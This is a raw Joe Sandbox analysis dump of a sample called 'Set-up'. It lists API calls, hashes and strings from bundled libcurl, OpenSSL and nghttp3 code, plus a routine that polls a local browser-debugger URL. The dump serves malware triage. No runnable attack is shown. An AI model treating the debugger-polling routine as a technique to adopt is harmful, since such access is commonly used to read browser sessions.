                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                • Instruction ID: 225e67725f9c965f897a2771e5b2d3b1aa07327ba93bc932315aa31f613f3393
                                • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                • Instruction Fuzzy Hash: 8931C4313083194BCF14AD6DC8C422BFAD39BD8350F55863EE589C3380E9758C6986CB
                                APIs
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 003085B6
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ANY PRIVATE KEY), ref: 003085CC
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PARAMETERS), ref: 003085E2
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X9.42 DH PARAMETERS), ref: 003085F8
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DH PARAMETERS), ref: 0030860A
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X509 CERTIFICATE), ref: 00308620
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00308634
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NEW CERTIFICATE REQUEST), ref: 0030864A
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE REQUEST), ref: 0030865C
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00308672
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 003086A0
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 003086BA
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 003086D0
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 003086E2
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 003086FC
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00308712
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 0030872A
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00308686
                                  • Part of subcall function 002ECBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,002C7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,002C40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002ECBD2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcmp$free
                                • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
                                • API String ID: 3401341699-4246700284
                                • Opcode ID: be2826a77b382f51fd0109ee3e605fe81c500cbf79b7d07bcf4bb4eff16a3a4d
                                • Instruction ID: c45a6dea8a6ab77caef4038a7b41772fc5767d841746d9f8d1c329896869d5bd
                                • Opcode Fuzzy Hash: be2826a77b382f51fd0109ee3e605fe81c500cbf79b7d07bcf4bb4eff16a3a4d
                                • Instruction Fuzzy Hash: 9DB15AF1A4630627DE127725AC23FAB36881F6179DF48443CF988A02C3FFA9E5158657
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0018204A
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00182068
                                • WSAGetLastError.WS2_32 ref: 001820DE
                                • recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 0018214D
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00182365
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 0018238F
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001823B9
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 0018241D
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 001824AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
                                • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                • API String ID: 3302935713-3407012168
                                • Opcode ID: 5e354658b51150a78df5e8a676383d358c83f99a17022883e398934f5e3b9478
                                • Instruction ID: b88b51c7056b62db36987ee496653175b00bd14d12fc294d2bb56222742646a3
                                • Opcode Fuzzy Hash: 5e354658b51150a78df5e8a676383d358c83f99a17022883e398934f5e3b9478
                                • Instruction Fuzzy Hash: E0E134B5A00301ABD712EB28DC41B7BB7E5FF94704F098529FC4897282E774EA10CB92
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 001BA29A
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 001BA2C5
                                • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 001BA2E3
                                  • Part of subcall function 001BA5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 001BA5FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy$memmove
                                • String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
                                • API String ID: 1283327689-1606465060
                                • Opcode ID: 29135a27ec9015c7782e8dc63f41380f6a805b2da16790f114efbe23eced3186
                                • Instruction ID: 066bf7c5c0e011404fef39d0220b9dbf8f7f75b5d379f1f65a1a176e1135c796
                                • Opcode Fuzzy Hash: 29135a27ec9015c7782e8dc63f41380f6a805b2da16790f114efbe23eced3186
                                • Instruction Fuzzy Hash: 85C1F371600305EFCB14DF18C8859AAB7E5FF88314F98862DF9599B292D770ED84CB82
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00182AD7
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00182B3D
                                • sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00182D30
                                • WSAGetLastError.WS2_32 ref: 00182D3A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$ErrorLastsendto
                                • String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
                                • API String ID: 3285375004-3063461439
                                • Opcode ID: 8e66bcece5930d9186ab076228a8d17f311e9afaa4f722102e9ee8fb076125af
                                • Instruction ID: 53556abeb131a0b1c7a270f8367ac154637b45a4e6e0caa6ed198124ab601050
                                • Opcode Fuzzy Hash: 8e66bcece5930d9186ab076228a8d17f311e9afaa4f722102e9ee8fb076125af
                                • Instruction Fuzzy Hash: CCE12971B00304ABD719FB28CC46FBA7395AF61708F094569FD185B392E772EA14CBA1
                                APIs
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00134749
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 001348E5
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0013491B
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134963
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00134971
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0013497B
                                  • Part of subcall function 001306F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00135663,?), ref: 001306F9
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134A41
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00134A63
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134A6D
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00134AE0
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134AEA
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00134B28
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134B34
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00134B76
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134B80
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno$strtoul$strchr$memchrstrlen
                                • String ID: %ld$%u.%u.%u.%u$urlapi.c
                                • API String ID: 102816355-2423153182
                                • Opcode ID: 44118acb66fce03f7bdc2c697080699759db8fab639e840a178fb2b808bad8ea
                                • Instruction ID: 2aa5f644b6bca5af33781ffdadd6d8a9e8322b5e0c7b82dc40217b99b56271fd
                                • Opcode Fuzzy Hash: 44118acb66fce03f7bdc2c697080699759db8fab639e840a178fb2b808bad8ea
                                • Instruction Fuzzy Hash: C9D146B1908341ABEB20AB24DC42B7B7BE49F51315F05443CF88A9B282F739ED54C796
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 0018C37A
                                • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 0018C476
                                • WSAGetLastError.WS2_32 ref: 0018C4AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLastmemcpystrcpy
                                • String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
                                • API String ID: 31095072-3036451936
                                • Opcode ID: fed33ab2645c624b85bcf2112a5e68f1e4ecf8908caca8ae56e80cb78b917bb9
                                • Instruction ID: 4e6ac435989ca32073affedc80ef5a785f3cd5a59f5ab3d9421ddfff3fcd8d6f
                                • Opcode Fuzzy Hash: fed33ab2645c624b85bcf2112a5e68f1e4ecf8908caca8ae56e80cb78b917bb9
                                • Instruction Fuzzy Hash: 1F5127B1A083489FDB10AA54DC01B7FBB95DF91318F05842DF9889B242D775EA948FA2
                                APIs
                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0039EA90
                                • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 0039EAD9
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0039EB98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno_stat64tolower
                                • String ID: Calling OPENSSL_DIR_read("%s")$Given path=%s$calling stat(%s)$file:$file_open$file_open_dir$file_open_stream$localhost/$providers/implementations/storemgmt/file_store.c
                                • API String ID: 3401003986-2019258128
                                • Opcode ID: 82649f1c9d01458b892426e657e15be09c057f9e07a20f8542c848fd0aa510ae
                                • Instruction ID: 9ce2471e9f4eb0738fdb6f2bbe9434fc30187333b9db0c76d287a5f62d9d50a0
                                • Opcode Fuzzy Hash: 82649f1c9d01458b892426e657e15be09c057f9e07a20f8542c848fd0aa510ae
                                • Instruction Fuzzy Hash: 20714B71A543006BDF21BB60AC43F2A7794AF11754F094928F989962C3F7B9E820CF97
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
                                • API String ID: 0-3171374047
                                • Opcode ID: 79f91a1ae0af82b00cde3f3c5edd910c943dc262aaac2a90c012d6789b40d648
                                • Instruction ID: e9b6616962ab214b8ff216bed574b7b4b3074ddd710a035162f452f18e4da53c
                                • Opcode Fuzzy Hash: 79f91a1ae0af82b00cde3f3c5edd910c943dc262aaac2a90c012d6789b40d648
                                • Instruction Fuzzy Hash: 74B19E70A083019BDB259B24C881B7A77F4BF55704F19C13AF8AD47282DB359F86E792
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00707F98,sfparse.c,000002B9,001AAF5D,?,001AAA4A,001AAF5B,00000000,00000000), ref: 001AAA6A
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00707F98,sfparse.c,000002EA,?,001AAA4A,001AAF5B,00000000,00000000), ref: 001AAAED
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00707F98,sfparse.c,0000030E), ref: 001AAB78
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00707F98,sfparse.c,000002B9), ref: 001AABAA
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00707F98,sfparse.c,00000378,?,?,?,001AA378,?,?,?), ref: 001AACBF
                                Strings
                                Similarity
                                • API ID: _assert
                                • String ID: sfparse.c
                                • API String ID: 1222420520-2103165582
                                • Opcode ID: 632db029ef644f436699277333f5e81f40dba4b301b8402da179e72223359ce9
                                • Instruction ID: bf62bffc34e79ef7994fb29d693b47cfae3750ce27d7a4e8b5019fcc8d33f08b
                                • Opcode Fuzzy Hash: 632db029ef644f436699277333f5e81f40dba4b301b8402da179e72223359ce9
                                • Instruction Fuzzy Hash: DDD1E27C6442028FDB394B28D884B39B7D2AF57325FB8865DE0A6C72D1E735A881C753
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001120D4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001122D0
                                Strings
                                Similarity
                                • API ID: freemalloc
                                • String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
                                • API String ID: 3061335427-1249806554
                                • Opcode ID: 74c70d7252f37de2108cfabedbe6edb97c1ca2a3bd8efe6c87256f0973a3f521
                                • Instruction ID: af5816e0cef26f2ff1a9a23b607d7607c6f9280477763ecbdee67da126ea18be
                                • Opcode Fuzzy Hash: 74c70d7252f37de2108cfabedbe6edb97c1ca2a3bd8efe6c87256f0973a3f521
                                • Instruction Fuzzy Hash: BD61A2B0909309EFDB44EFA8D48579EBBF0BF58314F11882DE598A7341D77899848F92
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 001B499C
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!conn->server,nghttp3_conn.c,00000A08), ref: 001B4A0A
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A2B,?), ref: 001B4A8E
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,00000A2C), ref: 001B4AA3
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->inc == 0 || pri->inc == 1,nghttp3_conn.c,00000A2D), ref: 001B4AB8
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A3E,?), ref: 001B4B1A
                                Strings
                                Similarity
                                • API ID: _assert$memcpy
                                • String ID: !conn->server$conn->server$nghttp3_conn.c$pri->inc == 0 || pri->inc == 1$pri->urgency < NGHTTP3_URGENCY_LEVELS
                                • API String ID: 3718630003-1169204258
                                • Opcode ID: c67695eeee1278bd7ec9a16bd5fdb1775f3d6fdad988f74351e0972d01b16110
                                • Instruction ID: abbc1b32d517052db8dd3e821099851bfe2d4286a2e4512a0e9cbeee6fac1ad6
                                • Opcode Fuzzy Hash: c67695eeee1278bd7ec9a16bd5fdb1775f3d6fdad988f74351e0972d01b16110
                                • Instruction Fuzzy Hash: 275123B1640309ABD710DF38DC01BEB77E9EF5A358F048629FA95831D2D770A980C7A6
                                APIs
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00188C0E,?), ref: 002C45E3
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00188C0E,?), ref: 002C460A
                                Strings
                                Similarity
                                • API ID: strcmp
                                • String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
                                • API String ID: 1004003707-1524119518
                                • Opcode ID: a6c0ad39d09925abacef2d127d757dbad35744e66af3706a82505d8859ce1c53
                                • Instruction ID: 3be1700d778d4c5925aa712a38a75e90a6b16c3fd3902154eadfd8d75a913d8c
                                • Opcode Fuzzy Hash: a6c0ad39d09925abacef2d127d757dbad35744e66af3706a82505d8859ce1c53
                                • Instruction Fuzzy Hash: BA41CAB5BA430166E63176643C13F6771588F11B4AF19062CFD09652C3FAD5DD3889A3
                                APIs
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00176884
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 001768AC
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001768C1
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00176973
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00176983
                                • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00176995
                                Strings
                                Similarity
                                • API ID: memcpystrchr$atoistrlen
                                • String ID: [
                                • API String ID: 444251876-784033777
                                • Opcode ID: 6e3c9b45e1fe969f3605a28fd6449856c730f6eee424e567c83d16930a39c376
                                • Instruction ID: 540538c378e52bcd66f9e275acb38b5057ac056b483fc477a736533bdf709d0b
                                • Opcode Fuzzy Hash: 6e3c9b45e1fe969f3605a28fd6449856c730f6eee424e567c83d16930a39c376
                                • Instruction Fuzzy Hash: 2AB16B71608B919BDB3A8A25C89077B7FF8EB56304F18C52EE9CDC7181EB39C9448752
                                APIs
                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00116467
                                Strings
                                • # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00116462
                                • %s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00116540
                                • hsts.c, xrefs: 0011656B, 001165CF
                                • unlimited, xrefs: 001164A1
                                • %s%s "%s", xrefs: 001164AA
                                • %d%02d%02d %02d:%02d:%02d, xrefs: 001166D5
                                • mite, xrefs: 00116688
                                Similarity
                                • API ID: fwrite
                                • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
                                • API String ID: 3559309478-3911685517
                                • Opcode ID: 011ab137a5f36762bb48b2ae5bf856b5d972a2fd8fc24ce8e33764a685eb4370
                                • Instruction ID: 1f12af1942412d78b92dfe4f06406a7f0d05b9fab21e9344b815cc33a191efb2
                                • Opcode Fuzzy Hash: 011ab137a5f36762bb48b2ae5bf856b5d972a2fd8fc24ce8e33764a685eb4370
                                • Instruction Fuzzy Hash: 6081E6B1A05300AFD718DB24DC41BABB6E6AF99754F04453CF94987392EB32DD90CB92
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,0018DB9C,?,001B3BB8,00000000,?,?), ref: 001B6433
                                Strings
                                Similarity
                                • API ID: _assert
                                • String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
                                • API String ID: 1222420520-1470553442
                                • Opcode ID: d295d4de08e6fac3ab6c709484afd220d1a010ab070127126330be202449e47f
                                • Instruction ID: d10d6004349e3e6b9db0521ed2e5f2a5c52253323c881c3cda1458cfbd9b0714
                                • Opcode Fuzzy Hash: d295d4de08e6fac3ab6c709484afd220d1a010ab070127126330be202449e47f
                                • Instruction Fuzzy Hash: BC7159B0604344AFDB25DF24DC81AEEB7E5BFA8704F008528F94A972A1E774E950CB52
                                APIs
                                  • Part of subcall function 00135EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00135ED4
                                  • Part of subcall function 00154F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00154F9E
                                • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 0012EA9B
                                  • Part of subcall function 001306F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00135663,?), ref: 001306F9
                                Strings
                                Similarity
                                • API ID: strlen$atoistrcpy
                                • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
                                • API String ID: 2444498485-4197959747
                                • Opcode ID: e1a3b6eb9551d947faf37d6bab64444e89949de173e864a277e8486f58caf3f3
                                • Instruction ID: 9bf6590dd6df2bbe047cd71a120dfec1d19da25f904cb5b0e1a9f4f082633f94
                                • Opcode Fuzzy Hash: e1a3b6eb9551d947faf37d6bab64444e89949de173e864a277e8486f58caf3f3
                                • Instruction Fuzzy Hash: 53F11375904310ABEF249F24EC86BA63BD5AF60708F084479FC489E2D7F771E96487A1
                                APIs
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0030A61C
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 0030A632
                                  • Part of subcall function 0030A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,0030A654,?,PRIVATE KEY), ref: 0030A0BD
                                  • Part of subcall function 0030A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0030A0C8
                                  • Part of subcall function 0030A0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 0030A0DF
                                  • Part of subcall function 002838A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0028397E
                                Strings
                                Similarity
                                • API ID: strcmpstrlen
                                • String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
                                • API String ID: 3853617425-3686562516
                                • Opcode ID: d806003e0e47dc8a3181bea54ede8c1f0eb328d308a18ef8dd979a80a48580ea
                                • Instruction ID: f49de55c26e92fee2d09684edb64e79d80ac13269e92212b9a58a94ecea416a8
                                • Opcode Fuzzy Hash: d806003e0e47dc8a3181bea54ede8c1f0eb328d308a18ef8dd979a80a48580ea
                                • Instruction Fuzzy Hash: 99D13DB6A157007BE7227A60AC03F2F769C9F91744F054928FD48A61C3F675EC248BA3
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 001FC60E
                                Strings
                                • Too small FXP_STATUS, xrefs: 001FC517
                                • feWould block waiting for status message, xrefs: 001FC4A6
                                • Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 001FC444
                                • Too small FXP_HANDLE, xrefs: 001FC582, 001FC675
                                • Unable to allocate new SFTP handle structure, xrefs: 001FC646
                                • Unable to send FXP_OPEN*, xrefs: 001FC45B
                                • Timeout waiting for status message, xrefs: 001FC4FB
                                • Response too small, xrefs: 001FC4E3
                                • Failed opening remote file, xrefs: 001FC531
                                • Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 001FC410
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
                                • API String ID: 3510742995-1499184223
                                • Opcode ID: 9a2da5d3c6b35ffcbbd3f3ee40e6f77f47dd0b89d6b54e86cb3a671ad9020f85
                                • Instruction ID: a21f41201fc8e4596b2eb2b26b62566ddacdd6502fc196b9a3655208726326f0
                                • Opcode Fuzzy Hash: 9a2da5d3c6b35ffcbbd3f3ee40e6f77f47dd0b89d6b54e86cb3a671ad9020f85
                                • Instruction Fuzzy Hash: 31B148B09047499BDB14CF28DD41B7BB7E4FF95318F044A2CFA4692292E770D918CB92
                                APIs
                                • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,0015CC57), ref: 0015F028
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strrchr
                                • String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
                                • API String ID: 3418686817-2910492138
                                • Opcode ID: 92b648c69cafb70f0dbb7befd966801fbf97c9131fd1e33bd444a5734a870631
                                • Instruction ID: 72da94a99e3628eea8500b2fb991cfa0824a8f053747b188a717e3a03b9eb220
                                • Opcode Fuzzy Hash: 92b648c69cafb70f0dbb7befd966801fbf97c9131fd1e33bd444a5734a870631
                                • Instruction Fuzzy Hash: C6A13471B00314EBE7249A24DC45B777ADAEB9130AF08407DED688F283D766DE4AC790
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 001BA9E8
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < blk->n,nghttp3_ksl.c,000002C3,?,?,?,?,?,001B71B7,00000001,?,?), ref: 001BAA04
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key),nghttp3_ksl.c,000002C7,?,001B71B7,00000001,?,?), ref: 001BAA19
